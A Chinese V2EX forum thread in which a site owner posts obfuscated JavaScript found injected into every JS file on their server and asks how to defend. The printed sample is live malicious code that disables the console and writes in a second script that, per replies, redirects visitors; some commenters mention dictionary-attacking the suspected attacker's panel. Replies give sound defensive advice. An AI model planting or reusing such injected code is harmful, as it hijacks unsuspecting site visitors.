V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
xiaonianji
V2EX  ›  程序员

网站所有的 Js 文件被加入了下面的这段代码,请问是什么原因呢?该如何防御

 •  
 •   xiaonianji · 196 天前 · 5004 次点击
  这是一个创建于 196 天前的主题,其中的信息可能已经有所发展或是发生改变。
  代码如下


  var a = ['w4kGaULCug==', 'wovDrMK0w7/DgQ==', 'wo3DlsKUwqfCmMK/YW3CmzAc', 'w6JSwpTCg8Ki', 'w4HDvMKhZQE=', 'Nm/Dn8OPYQ==', 'NXNkMTM=', 'w6XDiwzDlsKA', 'KsO/aEPCuFfCjAorUk7CjcO4wrISw6fChsO9bQ==', 'wp1JfGY9', 'w6XDgg/DjcKpw7YQ', 'w5PDrCvDmcKB', 'wq1yw4TDrMOV', 'w68FQ3fCgA==', 'TMKNDlvDpAjDtA==', 'wqvDgiMFSkRzwoFj', 'PsKbw7XCgVA=', 'wrpzD8O4wrLCsGU=', 'Y8OMw78nw4LCmzM=', 'w68rbmrCtA==', 'cMKFwq3CqT0=', 'wqLDkSTCow==', 'w4lew5nCu8K2B8KT', 'w4QJwplKw5s=', 'wpnDrMKow7rDjA==', 'KsO/aEPCuFfCjA1vBwvDjsO4wrMUw7rCjsO/bSTCgw==', 'wpbCjnLCnQ==', 'F8OAwqzDmUI=', 'w6wZJMKx', 'wrbCnUnCpsOl', 'LUPDi8OGdQ==', 'dcKsFTfCiA==', 'w6wLdlw=', 'VsKvwrXCkA7CkxNdAsOnwqZhK8OAw5dIw51hwqg+w64=', 'w5DDq8Kgfg==', 'w43CpVLCuMKz', 'VcKhO1jDoQ==', 'wqEgEcKvUg==', 'CMKnw47CkloTw4zCk2LDkcKPWg9GTsOlw43DqH/DlcKS', 'NcOpwrfDuMKv', 'w48uwow=', 'w4xYAExsw5NaSMKYLMKPFE0DBcOmw5bDum4=', 'W8KQAUvDrg==', 'wqF3w5fDi8Ox', 'H3LDqMOVZw==', 'UMKvwrLCkQ==', 'WQcTw4vDgA==', 'w4oxTQEVcMK5', 'WMK6BnHDog==', 'wpPDmW3CtsOU', 'GcKtw5TClEcRwok=', 'Y8OMw78nw5nChSMBOcK8w6A=', 'TCzCuT/Djw==', 'w5/ClsOKDMKr', 'wp/Dj0jCg2A=', 'wojCrcOOAHUhNGAzWsO7wqDDscKnwoHCq8OnJVA=', 'wpvDusK1w77Dsw==', 'wpHDssK+w7k=', 'wql2w4A=', 'w7hpw73DqMK6', 'P8O1wovDgXE=', 'w6vCiVLCvcKP', 'aMOOw50Cw48=', 'SsOvHAHDhsKrw4NtwqbCm8KnHcOZVAwjYHzDicOEaTlvw4E=', 'w6Rqw67CgGc=', 'w7DDgcK/RjI=', 'w6cYwqR4w4U=', 'w69kw7vCt8KE', 'w7IEYl0=', 'KMObdHvCrA==', 'dsKmwqzClSo=', 'E8OTwotIAw==', 'LMO1W3PCpg==', 'w4guUx4D', 'R8Krwq/CtxU=', 'w7ZKw6LCg8KeYCo=', 'WD4hw77Dug==', 'CmBXCzk=', 'w7vCk8OkZlQ=', 'asKowqPCtxM=', 'CcONwrjDm8Kf', 'wooBQg5dW8KHw4nDqyDDlg/CllsXFcKTwo/Dr3HDp8OiwqTCskvCkxrCt0jDtSk0', 'KcODwr7Dj8KG', 'agk1w5HDig==', 'XsKLw4oKwo3Cqn1KbcO4w4kLD8KqYBRcw6/CqyPCqsO9PyM=', 'w4PCs33Cg8Kk', 'wo3Drz00w74=', 'w7NAw7/CvF8=', 'w4fDocK+ehrDnMO/', 'w7NGw4fCvMK9', 'woxtYAEZbsK1c0vDjsKxO2tcNcKHwpLDq2PDkRzCh3Q+E8KcwpFdIMK+w5xiTCoMNMOPM8O1FcOUDB1+wok6MTbCvMKVDMO4w57Cug7DpcKowrXDj8OLw5sWwpXCliMTZlxUwqTCgTTDsMOXF8KECmfDt8KhwqVO', 'w7Ndw5vCkcKD', 'w4/CocKbFTM=', 'w6JXw6XChMKU', 'w6PDnxPDkcK0', 'w6TCr1vCpsKd', 'w40iwqlow6w=', 'FMOCwoVNEg==', 'wrZCVifCpw==', 'w5dUwqzCoMKu', 'dgUJw6nDpQ==', 'wqkpL8KHUmAM'];
  (function(b, c) {
  var d = function(f) {
  while (--f) {
  b['push'](b['shift']());
  }
  };
  var e = function() {
  var f = {
  'data': {
  'key': 'cookie',
  'value': 'timeout'
  },
  'setCookie': function(l, m, n, o) {
  o = o || {};
  var p = m + '=' + n;
  var q = 0x0;
  for (var r = 0x0, s = l['length']; r < s; r++) {
  var t = l[r];
  p += ';\x20' + t;
  var u = l[t];
  l['push'](u);
  s = l['length'];
  if (u !== !![]) {
  p += '=' + u;
  }
  }
  o['cookie'] = p;
  },
  'removeCookie': function() {
  return 'dev';
  },
  'getCookie': function(l, m) {
  l = l || function(p) {
  return p;
  }
  ;
  var n = l(new RegExp('(?:^|;\x20)' + m['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
  var o = function(p, q) {
  p(++q);
  };
  o(d, c);
  return n ? decodeURIComponent(n[0x1]) : undefined;
  }
  };
  var i = function() {
  var l = new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');
  return l['test'](f['removeCookie']['toString']());
  };
  f['updateCookie'] = i;
  var j = '';
  var k = f['updateCookie']();
  if (!k) {
  f['setCookie'](['*'], 'counter', 0x1);
  } else if (k) {
  j = f['getCookie'](null, 'counter');
  } else {
  f['removeCookie']();
  }
  };
  e();
  }(a, 0x179));
  var b = function(c, d) {
  c = c - 0x0;
  var e = a[c];
  if (b['KyesdD'] === undefined) {
  (function() {
  var h = function() {
  var k;
  try {
  k = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');')();
  } catch (l) {
  k = window;
  }
  return k;
  };
  var i = h();
  var j = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
  i['atob'] || (i['atob'] = function(k) {
  var l = String(k)['replace'](/=+$/, '');
  var m = '';
  for (var n = 0x0, o, p, q = 0x0; p = l['charAt'](q++); ~p && (o = n % 0x4 ? o * 0x40 + p : p,
  n++ % 0x4) ? m += String['fromCharCode'](0xff & o >> (-0x2 * n & 0x6)) : 0x0) {
  p = j['indexOf'](p);
  }
  return m;
  }
  );
  }());
  var g = function(h, l) {
  var m = [], n = 0x0, o, p = '', q = '';
  h = atob(h);
  for (var t = 0x0, u = h['length']; t < u; t++) {
  q += '%' + ('00' + h['charCodeAt'](t)['toString'](0x10))['slice'](-0x2);
  }
  h = decodeURIComponent(q);
  var r;
  for (r = 0x0; r < 0x100; r++) {
  m[r] = r;
  }
  for (r = 0x0; r < 0x100; r++) {
  n = (n + m[r] + l['charCodeAt'](r % l['length'])) % 0x100;
  o = m[r];
  m[r] = m[n];
  m[n] = o;
  }
  r = 0x0;
  n = 0x0;
  for (var v = 0x0; v < h['length']; v++) {
  r = (r + 0x1) % 0x100;
  n = (n + m[r]) % 0x100;
  o = m[r];
  m[r] = m[n];
  m[n] = o;
  p += String['fromCharCode'](h['charCodeAt'](v) ^ m[(m[r] + m[n]) % 0x100]);
  }
  return p;
  };
  b['pwSzdv'] = g;
  b['FHYCZA'] = {};
  b['KyesdD'] = !![];
  }
  var f = b['FHYCZA'][c];
  if (f === undefined) {
  if (b['ofguEY'] === undefined) {
  var h = function(i) {
  this['XPARKA'] = i;
  this['SpQSlz'] = [0x1, 0x0, 0x0];
  this['GnmFej'] = function() {
  return 'newState';
  }
  ;
  this['QkHizH'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';
  this['gXalrj'] = '[\x27|\x22].+[\x27|\x22];?\x20*}';
  };
  h['prototype']['qxjHTI'] = function() {
  var i = new RegExp(this['QkHizH'] + this['gXalrj']);
  var j = i['test'](this['GnmFej']['toString']()) ? --this['SpQSlz'][0x1] : --this['SpQSlz'][0x0];
  return this['nPEtwj'](j);
  }
  ;
  h['prototype']['nPEtwj'] = function(i) {
  if (!Boolean(~i)) {
  return i;
  }
  return this['KgZUjW'](this['XPARKA']);
  }
  ;
  h['prototype']['KgZUjW'] = function(j) {
  for (var k = 0x0, l = this['SpQSlz']['length']; k < l; k++) {
  this['SpQSlz']['push'](Math['round'](Math['random']()));
  l = this['SpQSlz']['length'];
  }
  return j(this['SpQSlz'][0x0]);
  }
  ;
  new h(b)['qxjHTI']();
  b['ofguEY'] = !![];
  }
  e = b['pwSzdv'](e, d);
  b['FHYCZA'][c] = e;
  } else {
  e = f;
  }
  return e;
  };
  var f = function() {
  var h = {};
  h[b('0x6', '7Dxc')] = function(k, l) {
  return k === l;
  }
  ;
  h[b('0x61', 'a%oA')] = 'YbZMj';
  h['cRxxV'] = b('0x12', 'wF91');
  h[b('0x14', 'wF91')] = b('0x48', 'COhn');
  var i = h;
  var j = !![];
  return function(k, l) {
  var m = {};
  m[b('0x1d', '[email protected]')] = i[b('0x54', '$VHR')];
  var n = m;
  var o = j ? function() {
  if (l) {
  if (i[b('0x18', 'U5mN')](i[b('0x2f', ')DXv')], i[b('0x5', 'LX^G')])) {
  var r = n[b('0x4a', 'L1Y&')][b('0x20', 'Lyt0')]('|');
  var s = 0x0;
  while (!![]) {
  switch (r[s++]) {
  case '0':
  t['log'] = func;
  continue;
  case '1':
  t[b('0x63', 'Is#S')] = func;
  continue;
  case '2':
  return t;
  case '3':
  t[b('0x3b', 'FOKP')] = func;
  continue;
  case '4':
  t['trace'] = func;
  continue;
  case '5':
  t['exception'] = func;
  continue;
  case '6':
  t[b('0x10', '(JP]')] = func;
  continue;
  case '7':
  t['debug'] = func;
  continue;
  case '8':
  t['table'] = func;
  continue;
  case '9':
  var t = {};
  continue;
  }
  break;
  }
  } else {
  var p = l[b('0x2', '[email protected]')](k, arguments);
  l = null;
  return p;
  }
  }
  }
  : function() {}
  ;
  j = ![];
  return o;
  }
  ;
  }();
  var e = f(this, function() {
  var h = {};
  h['gHrTf'] = function(k, l) {
  return k !== l;
  }
  ;
  h[b('0x42', 'U5mN')] = b('0x8', 'QhWC');
  h[b('0x64', 'K1$*')] = b('0x45', ')DXv');
  h['akRhn'] = function(k) {
  return k();
  }
  ;
  var i = h;
  var j = function() {
  if (i[b('0x36', 'a%oA')](i[b('0x55', 'sWxZ')], i['HOBsm'])) {
  var m = fn[b('0x1c', 'no2k')](context, arguments);
  fn = null;
  return m;
  } else {
  var k = j[b('0x21', 'gppR')](i[b('0x3a', ')@iy')])()[b('0x1e', 'sJRr')]('^([^\x20]+(\x20+[^\x20]+)+)+[^\x20]}');
  return !k[b('0x41', 'pizW')](e);
  }
  };
  return i[b('0x3e', 'DccT')](j);
  });
  e();
  var d = function() {
  var h = {};
  h['EXaez'] = function(k, l) {
  return k === l;
  }
  ;
  h[b('0x25', 'S7WR')] = b('0x46', '9qRx');
  h['rXcSJ'] = function(k, l) {
  return k !== l;
  }
  ;
  h['FYmHz'] = b('0x4f', '6Xv9');
  var i = h;
  var j = !![];
  return function(k, l) {
  var m = {};
  m[b('0xf', '%YCE')] = function(p, q) {
  return i['EXaez'](p, q);
  }
  ;
  m['sYoxR'] = i[b('0x24', 'qCYr')];
  m['XtOUU'] = b('0xd', 'eo4*');
  var n = m;
  if (i[b('0x5f', '(JP]')](i[b('0xe', 'U5mN')], b('0x44', 'sJRr'))) {
  var o = j ? function() {
  if (n[b('0x53', ')Yx7')](n[b('0x43', '5y70')], b('0x2b', 'L1Y&'))) {
  if (l) {
  var p = l[b('0x37', 'Lyt0')](k, arguments);
  l = null;
  return p;
  }
  } else {
  var r = j ? function() {
  if (l) {
  var s = l['apply'](k, arguments);
  l = null;
  return s;
  }
  }
  : function() {}
  ;
  j = ![];
  return r;
  }
  }
  : function() {}
  ;
  j = ![];
  return o;
  } else {
  var q = test['constructor'](b('0x38', 'K1$*'))()[b('0x30', 'C[x2')](n[b('0x5b', ')@iy')]);
  return !q[b('0x4c', 'QhWC')](e);
  }
  }
  ;
  }();
  var c = d(this, function() {
  var h = {};
  h[b('0x1f', 'Is#S')] = function(o, p) {
  return o(p);
  }
  ;
  h['toGEl'] = function(o, p) {
  return o + p;
  }
  ;
  h['zAwGu'] = function(o) {
  return o();
  }
  ;
  h[b('0x1b', 'Qx0k')] = function(o, p) {
  return o !== p;
  }
  ;
  h[b('0x33', 'QhWC')] = b('0x3', 'QhWC');
  h['UAJgG'] = b('0x56', 'P2iv');
  h[b('0x22', 'no2k')] = b('0x40', 'QhWC');
  h[b('0x32', 'Is#S')] = b('0x5e', 'DccT');
  h[b('0x5a', '9sO)')] = function(o, p) {
  return o(p);
  }
  ;
  h['mlNWi'] = '{}.constructor(\x22return\x20this\x22)(\x20)';
  h[b('0x28', 'COhn')] = function(o, p) {
  return o !== p;
  }
  ;
  h[b('0x5c', 'U5mN')] = 'AXmVx';
  var i = h;
  var j = function() {};
  var k;
  try {
  var l = i[b('0x4b', 'qCYr')](Function, i[b('0x2c', 'Is#S')](b('0x27', 'K1$*'), i['mlNWi']) + ');');
  k = i[b('0x3d', 'qCYr')](l);
  } catch (o) {
  k = window;
  }
  if (!k[b('0x29', '3B1d')]) {
  k['console'] = function(p) {
  if (i[b('0xc', 'LX^G')](i[b('0x60', 'pizW')], i[b('0x9', '9qRx')])) {
  var u = i[b('0x65', 'QhWC')](Function, i['toGEl'](i[b('0x1', 'K1$*')]('return\x20(function()\x20', b('0xa', '0uLu')), ');'));
  k = i[b('0x62', 'wF91')](u);
  } else {
  var q = i[b('0x2a', '3B1d')][b('0x0', 'ixyG')]('|');
  var r = 0x0;
  while (!![]) {
  switch (q[r++]) {
  case '0':
  s['exception'] = p;
  continue;
  case '1':
  s[b('0x23', 'pizW')] = p;
  continue;
  case '2':
  s[b('0x3f', 'Is#S')] = p;
  continue;
  case '3':
  s['debug'] = p;
  continue;
  case '4':
  var s = {};
  continue;
  case '5':
  s[b('0x50', 'bi5R')] = p;
  continue;
  case '6':
  return s;
  case '7':
  s[b('0x49', '6Xv9')] = p;
  continue;
  case '8':
  s[b('0x34', 'Ng&Q')] = p;
  continue;
  case '9':
  s[b('0x59', 'L1Y&')] = p;
  continue;
  }
  break;
  }
  }
  }(j);
  } else {
  if (i[b('0x5d', 'eo4*')](i[b('0x19', 'a%oA')], 'hUGoc')) {
  var m = '1|5|2|4|0|3|7|6'[b('0x15', 'P2iv')]('|');
  var n = 0x0;
  while (!![]) {
  switch (m[n++]) {
  case '0':
  k['console'][b('0x17', '3B1d')] = j;
  continue;
  case '1':
  k[b('0x51', ')DXv')][b('0x47', 'a%oA')] = j;
  continue;
  case '2':
  k[b('0x31', 'eo4*')]['debug'] = j;
  continue;
  case '3':
  k[b('0x2d', '6Xv9')][b('0x2e', 'ZeYJ')] = j;
  continue;
  case '4':
  k[b('0x4', 'wF91')][b('0x58', 'Lyt0')] = j;
  continue;
  case '5':
  k[b('0x4e', '[email protected]')]['warn'] = j;
  continue;
  case '6':
  k['console']['trace'] = j;
  continue;
  case '7':
  k[b('0x35', '6AQ3')][b('0x1a', 'ixyG')] = j;
  continue;
  }
  break;
  }
  } else {
  var q = {};
  q[b('0x26', '3B1d')] = i[b('0x3c', 'e8v^')];
  q[b('0x4d', '[email protected]')] = i[b('0xb', '9qRx')];
  var r = q;
  var s = function() {
  var t = s[b('0x52', 'eo4*')](r[b('0x57', 'Lyt0')])()[b('0x11', 'pizW')](r[b('0x7', '0Y9T')]);
  return !t[b('0x39', 'e8v^')](e);
  };
  return s();
  }
  }
  });
  c();
  document[b('0x16', 'wF91')](unescape(b('0x13', '[email protected]')));
  29 条回复    2022-11-16 09:31:43 +08:00
  Kakus
      1
  Kakus  
     196 天前
  Kakus
      2
  Kakus  
     196 天前
  @Kakus 第一段是上面这个,加载另一段 js ,加载的 js 里面看上去就是跳转小网站的

  lichdkimba
      3
  lichdkimba  
     196 天前
  @Kakus 这咋还原的
  Kakus
      4
  Kakus  
     196 天前   ❤️ 1
  JS 混淆还原,使用的这个工具: https://ob.nightteam.cn/
  FrankFang128
      5
  FrankFang128  
     196 天前
  开启 https 即可
  Leo306
      6
  Leo306  
     196 天前
  流量劫持?建议使用 https
  ysc3839
      7
  ysc3839  
     196 天前
  先在服务器上用 wget 或 curl 访问本机地址看看是不是也包含这些。如果是的话说明服务器中毒了,建议备份数据重装。如果不是的话开启 https 。
  MMMMMMMMMMMMMMMM
      8
  MMMMMMMMMMMMMMMM  
     196 天前
  看了一下他的 apk 和网站源码,似乎是一个叫“宝塔”系统,不知道有什么漏洞没

  http://xin.alimp4.com:8888/login

  http://aliysapp1.com:10101
  tkHello
      9
  tkHello  
     196 天前
  装流氓软件了
  huangqihong
      10
  huangqihong  
     196 天前
  @Kakus 打不开啊
  dextercai
      11
  dextercai  
     196 天前
  大概率是根据 reference 来跳转到别的页面。比如搜索引擎进来的流量可以被他导到他的 apk 下载页面。
  而网站管理者因为一般都是直接访问的,可能浑然不知。

  建议查查服务器那边是不是有人进来动过了。
  xiaonianji
      12
  xiaonianji  
  OP
     196 天前
  @FrankFang128 已经开启 https
  xiaonianji
      13
  xiaonianji  
  OP
     196 天前
  @Kakus 网站打不开呀
  Kakus
      14
  Kakus  
     196 天前
  @huangqihong
  @xiaonianji
  网上随便找的工具,可能被大家点挂了吧
  Kakus
      15
  Kakus  
     196 天前
  @huangqihong
  @xiaonianji
  目前可以正常访问
  xiaonianji
      16
  xiaonianji  
  OP
     196 天前
  @Kakus 感谢!请问大佬他是怎么把修改我的 Js 文件的?该如何防御呀?感觉被他盯上了。。
  Kakus
      17
  Kakus  
     196 天前
  @xiaonianji 参考#6 #7 说的,先判断是源文件被改动,还是流量劫持
  xiaonianji
      18
  xiaonianji  
  OP
     196 天前
  @Kakus 登录服务器查看是源文件被改动了,我现在是手动删除了加入的代码,只是不知道如何防御
  xdym520
      19
  xdym520  
     196 天前
  先检查一下网站有没有什么漏洞吧
  ztaosony
      20
  ztaosony  
     196 天前
  你服务器被搞了
  frank553000
      21
  frank553000  
     196 天前
  之前也是很多国外的服务器和国外 IP 的虚拟主机被插了这种代码,不知道哪来的
  Kakus
      22
  Kakus  
     196 天前
  @xiaonianji 有条件重装的话,最好重装一下系统;然后关闭账号密码登录,改用密钥文件登录。
  pipiqiang
      23
  pipiqiang  
     196 天前
  花点钱请人帮忙看下是不是系统有漏洞吧....
  systemcall
      24
  systemcall  
     196 天前
  要是没什么重要的服务,备份一下数据重装吧
  Linux 服务器其实也挺容易被挂马的
  只不过 Windows 服务器被挂马了,一般壁纸会被换掉,很容易看出来
  aoling
      25
  aoling  
     196 天前
  你网站被入侵了,请检查后门

  或者设置 strict-origin-when-cross-origin
  Features
      26
  Features  
     196 天前
  @MMMMMMMMMMMMMMMM 我测试一下就知道了,哈哈
  tf141
      27
  tf141  
     196 天前
  这个网站我前几天也碰到了,就是用浏览器搜东西突然就跳到一个 H 站,都不知道是从哪里跳的,没有访问危险网站,浏览器是 chrome ,怀疑是电脑中毒了,我还直接重装了系统,现在看会不会是运营商的问题
  MMMMMMMMMMMMMMMM
      28
  MMMMMMMMMMMMMMMM  
     196 天前
  @Features 我也扫了,还顺手跑了个字典,没跑出来就溜了
  l2d
      29
  l2d  
     195 天前
  这个问题大概率来源是跨站脚本攻击( XSS )。

  先从加载的位置删除这个脚本,这个是缓解措施。然后在后端加输入过滤,尤其是涉及数据库操作和直接返回外部输入的。从输入中转义掉 html 标签,双引号、实体编码等字符。
  还有开启一些全局的 XSS 防御配置项,比如 Spring 框架可以开启全局 xss 防护和 csp 限制 javascript 脚本的加载来源:
  @Configuration
  public class SecurityConf {

  @Bean
  public SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
  http.headers()
  .xssProtection()
  .and()
  .contentSecurityPolicy("script-src 'self'");
  return http.build();
  }
  }

  当然 csp 也包含一些其他的安全策略,可以参考 MDN 的官方文档: https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSP

  另外就是前端不要拼接原生 html ,如果需要自定义 html 的,用白名单标签做防御,白名单以外的标签转移掉
  关于   ·   帮助文档   ·   博客   ·   nftychat   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   796 人在线   最高记录 5634   ·     Select Language
  创意工作者们的社区
  World is powered by solitude
  VERSION: 3.9.8.5 · 198ms · UTC 20:04 · PVG 04:04 · LAX 13:04 · JFK 16:04
  Developed with CodeLauncher
  ♥ Do have faith in what you're doing.